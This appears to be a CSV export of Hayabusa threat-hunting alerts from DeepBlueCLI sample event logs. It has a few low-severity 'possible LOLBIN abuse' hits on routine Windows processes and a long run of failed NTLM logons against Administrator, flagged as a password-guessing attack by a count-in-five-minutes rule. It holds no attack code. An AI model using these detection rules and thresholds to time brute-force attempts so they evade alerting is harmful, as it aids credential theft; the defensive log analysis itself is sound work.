2016-09-20 00:15:06.588 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0xcc8 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-20 00:15:06.635 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0xc3c | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-20 00:21:37.109 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0xe88 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-20 00:21:40.687 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0xd1c | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-20 00:26:11.578 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""c:\program files\windows defender\MpCmdRun.exe"" SignaturesUpdateService | Path: C:\Program Files\Windows Defender\MpCmdRun.exe | PID: 0xb34 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-20 00:26:16.078 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\RunDll32.exe"" ""C:\Windows\system32\WerConCpl.dll"", LaunchErcApp -responsepester | Path: C:\Windows\System32\rundll32.exe | PID: 0x6a0 | User: IEUser | LID: 0x6593d",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-20 00:26:42.937 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\mmc.exe"" ""C:\Windows\system32\eventvwr.msc"" | Path: C:\Windows\System32\mmc.exe | PID: 0x37c | User: IEUser | LID: 0x6590f",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-20 00:45:37.636 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\wuauclt.exe"" /RunHandlerComServer | Path: C:\Windows\System32\wuauclt.exe | PID: 0xe8 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-20 01:36:17.350 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} | Path: C:\Windows\System32\dllhost.exe | PID: 0x508 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-20 01:50:06.477 +09:00,DESKTOP-M5SN04R,4625,info,,Logon Failure - User Does Not Exist,User: JcDfcZTc | Type: 3 | Computer: 6hgtmVlrrFuWtO65 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongUsername.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:06.513 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: gC4ymsKbxVGScMgY | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:06.513 +09:00,-,-,medium,CredAccess,Password Guessing Attack,[condition] count() by IpAddress >= 5 in timeframe [result] count:3558 IpAddress:192.168.198.149 timeframe:5m,rules/hayabusa/default/alerts/Security/4625_BruteForce_PasswordGuessingDetect.yml,-
2016-09-20 01:50:06.588 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: f2q1tdAUlxHGfGH6 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:06.637 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 3EPNzcwy7tOAADWx | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:06.680 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: AbwsMP10Rs4h1Wl1 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:06.725 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: EEcdqcpqsxQ4RgPx | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:06.773 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ngdtRwzXXhAlRxGY | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:06.816 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: BbCFZw5qQgU7rQ9W | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:06.869 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: SXr7lA3MkV6xK36f | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:06.909 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: tVFs1kR0AuOutnuI | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:06.977 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: PkeEabFrDLsBVcXi | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:07.008 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: GH7dTevmTKZo46Tq | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:07.052 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: l2E8JmrfaCj5AjSF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:07.091 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: N4FLUvawWPVqdLaD | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:07.136 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: KN0EeUzxSZy5l7J4 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:07.169 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: l8FjH0QHqromIYWf | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:07.217 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: fhlF37S1wNupiX5O | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:07.262 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: j19XhmSXK526I8kf | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:07.297 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: IRcppJXDNNfKuvdc | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:07.343 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: E0FoGAIAK2FV3zCJ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:07.393 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: uYWIk76XIksgN3sE | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:07.444 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 3FEop7o3SOolNvKs | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:07.484 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: cMGEM3ql9uov7zCP | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:07.520 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: EFPUA4pUPaLrkr1I | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:07.551 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: b7IeJU89jxitz407 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:07.590 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Wqj9nXRaDpwCJZO3 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:07.631 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: bl0d61v2Ux7cNv4r | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:07.663 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 8LxTa5lyutrIB2cd | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:07.684 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: LPCy11e3YxcCloSH | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:07.720 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Mj07WKc4aQqPC0Te | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:07.752 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: T2M3v4TsQul5R4sj | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:07.796 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: I67uBcH52tgLzhVB | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:07.835 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 2hsth68FDJ4F10H6 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:07.929 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: aDoHrfWlaWZ5GbWV | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:07.972 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: uliC5Wd7uZR3fIBc | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:08.000 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Unknown Reason,User: Administrator | Type: 3 | Computer: Xhg4hg4XDFaXsJRe | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-UnknownError.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:08.042 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Unknown Reason,User: Administrator | Type: 3 | Computer: ZrSGxwUyV6gCUPeb | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-UnknownError.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:08.179 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: XUBgTr05x3djEYdM | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:08.219 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 40PhGU4ZXu7uihop | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:08.335 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 1DJ9r72hXZH9rEkb | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:08.397 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: khy2BeyBb9wq00f7 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:08.462 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 1cDckicL7IMrO7OQ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:08.513 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: dEEkvfVd3FCap6fa | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:08.545 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: JGFSyHQ0ZNWofxzE | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:08.576 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ItOZqZSDTrdWpkbp | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:08.611 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: NhNdf5lHfrHKSCXq | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:08.646 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: xg05F6tdf3kR9kdP | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:08.693 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 70rRbaC6L6SzT15q | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:08.735 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: HnJyN8wF21ff2L1e | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:08.769 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: MUZHZJMQznj6GBqg | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:08.804 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: P9h52ZKMbXLuFvUV | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:08.839 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: n95RJvcQnFrAG2iX | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:08.883 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: xI23nmysFlr1pvVf | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:08.916 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: nVsjcTxDdZbzkmMx | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:08.955 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: mMuWatQuNBh9UKdR | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:08.992 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: BfC3JZ3awqFDNQbm | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:09.028 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 337h8PHN6Axi0iaY | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:09.071 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: qGQpWOuzgETfxTgJ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:09.108 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: oFjlyMAJMI2zIC8w | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:09.144 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 7exAVz3PlzJQ6Wcw | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:09.183 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: RuYihjQpt76foAW3 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:09.219 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: OlPm2vRh9EHN9J6n | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
